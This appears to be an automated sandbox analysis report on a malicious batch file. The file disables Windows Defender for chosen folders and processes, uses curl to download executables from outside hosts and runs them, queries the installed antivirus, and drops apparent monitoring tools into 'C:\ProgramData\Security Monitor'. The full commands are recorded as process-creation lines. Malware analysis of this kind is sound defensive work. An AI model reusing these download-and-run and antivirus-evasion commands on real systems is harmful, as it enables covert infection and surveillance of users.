Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00369DB0 appears 70 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00373380 appears 47 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00397140 appears 140 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00373610 appears 43 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 005ED1E8 appears 58 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00396FB0 appears 191 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00363850 appears 34 times

PE file contains executable resources (Code or Archives)

Source: [space]= .tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: [space]= .tmp.19.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-NNSLF.tmp.22.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-NNSLF.tmp.22.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-719F1.tmp.22.dr	Static PE information: Resource name: RT_BITMAP type: DOS executable (COM)
Source: is-719F1.tmp.22.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: is-719F1.tmp.22.dr	Static PE information: Resource name: RT_RCDATA type: COM executable for DOS

PE file contains more sections than normal

Source: is-1I5NJ.tmp.22.dr	Static PE information: Number of sections : 18 > 10
Source: is-719F1.tmp.22.dr	Static PE information: Number of sections : 13 > 10
Source: is-67IFD.tmp.22.dr	Static PE information: Number of sections : 11 > 10
Source: ffws.exe.56.dr	Static PE information: Number of sections : 11 > 10
Source: is-9U2JI.tmp.22.dr	Static PE information: Number of sections : 13 > 10

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"

Source: [space]= .exe.6.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: is-9U2JI.tmp.22.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: is-719F1.tmp.22.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0016526442307692
Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0007161458333333
Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-9U2JI.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0003823138297872
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0017903645833333
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0008680555555556
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-719F1.tmp.22.dr	Static PE information: Section: ZLIB complexity 1.0003551136363635

Source: [space]= .exe.6.dr, Settings.cs

Base64 encoded string: 'HUXwGsL2qA2Klp4GxVUBZj53IhCCt8FRahOgIF5wxEYiSEtN7bkJKWuhYdnhpIJq4ktEaX6sYgMULWkDwyERY4HDwqInaXGo4qnrUpvjd0tmKZWB2ku0E0SAcqRtPSSAZhZds1rHDewgKe2WTGuymPkDYmPnYBULitMlA1SA1nwjEuy7w3ZIhcXK5WFFmErCKl6aRQWbxu58cB8mxRzdkLmFVComwNWx4uYcxYpgh7TwfXq4XbRVOOa770EPksojXIErlfyYkT4l1zj6UtPU5BjpTad5Ua4yTsYXT8S0m1u3SyGHRG30dTnWiXXLC1DKYGSIbLnVaXrDQoWeUWnNfEU8FCy5lHytxjfMf7pGciZFljG2A20pOznTuSCYWqtSi6OpJK7Vqhu6nOXe445rQJf74LaN4QsuyHgnVZsz3e8pEqpg4hcauBCZbQu7suaZxAHgrtJfMFxvKy3Ne3SXwS8xEGLFouGJDi0EiJyLX6OoNQPlVgcybDmfATbkhEza8nrk7znVFH8yETkx0isISQqA4VDPrNmTHwpihnnf1HtUEwaqsms7VrHs6rolwYm0dorQnBPM3MPLfW4I3VfEeo7Yp5lz8Bsdd20YFKCqWfDIb5Mjvgra1iWypSkqZYN2dvqmffCsSyq7kz6ttBEbTRk4gBsvjUR7RKnoOiEPd8HD0XNzUz6XUviLLvGdwPJ6gspaLReK5y6UJhEIx1asX2nfkcdbckbNzKgHrwoDVwbexOBmr6p4xZjmFJyswCqUXsd8A5aBNXXjbIqVaztf4fZZj2Bh65PSGGHFtClugnraBAL5ccR6RKZ0TEZH42DQIEdUBlkXN88Qx8XjqEFdnSA4qPupmezmkaR5gz4z03sSLIDUpyZzwimzEhnvz4usJVpWqaD0JOltjrsiLaAwE8zBwb17MJA5I8IzcqmOviqi62QVxFjZ37oKfniPiFnAOokjj2FewuBeSRE3KfJHijBJU7TxHXoq4pTRRpv48ElI6J0OioEC4gannaPkiQXYGTil6wlesOHd71MKGFPbTmuYOonzaLVrqMCmjOQvDjSqY6puOEdcB5FchKWRJuDh1Zvuzij0ycXtTEAR82lVq1puGiEZ17mSfux8K34oemnihVJdKFSQIq0AsBnQdK8zzFNhQAHE760EOHNuZkOvpWJy'

Source: classification engine

Classification label: mal100.troj.evad.winBAT@160/1077@15/9

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_0037A2A0 GetLastError,_errno,strncpy,FormatMessageA,strrchr,strrchr,_errno,_errno,GetLastError,SetLastError,

71_2_0037A2A0

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376092 GetDiskFreeSpaceA,

56_2_03376092

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_00363700 memset,GetLastError,CreateToolhelp32Snapshot,GetLastError,Module32First,Module32Next,CloseHandle,

71_2_00363700

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\183942631522663

Jump to behavior

Source: Yara match	File source: 77.0.spmm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004D.00000000.2580594653.0000000000401000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp, type: DROPPED

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\D0WmCTD2qO.bat" "

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"

Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SEM.EXE'
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPM.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SEM.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\reg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AC6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: D0WmCTD2qO.bat	ReversingLabs: Detection: 26%
Source: D0WmCTD2qO.bat	Virustotal: Detection: 20%

Source: spkl.exe	String found in binary or memory: NATS-SEFI-ADD
Source: spkl.exe	String found in binary or memory: NATS-DANO-ADD
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: spkl.exe	String found in binary or memory: jp-ocr-b-add
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: spkl.exe	String found in binary or memory: jp-ocr-hand-add
Source: spkl.exe	String found in binary or memory: ISO_6937-2-add
Source: qrl.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: qrl.exe	String found in binary or memory: dns-ipv6-addr
Source: qrl.exe	String found in binary or memory: dns-ipv4-addr
Source: qrl.exe	String found in binary or memory: false-start
Source: qrl.exe	String found in binary or memory: --dns-ipv4-addr <address>
Source: qrl.exe	String found in binary or memory: --dns-ipv6-addr <address>
Source: qrl.exe	String found in binary or memory: --false-start
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: id-cmc-addExtensions
Source: qrl.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: qrl.exe	String found in binary or memory: set-addPolicy
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\D0WmCTD2qO.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Process created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp" /SL5="$30462,32862490,227328,C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
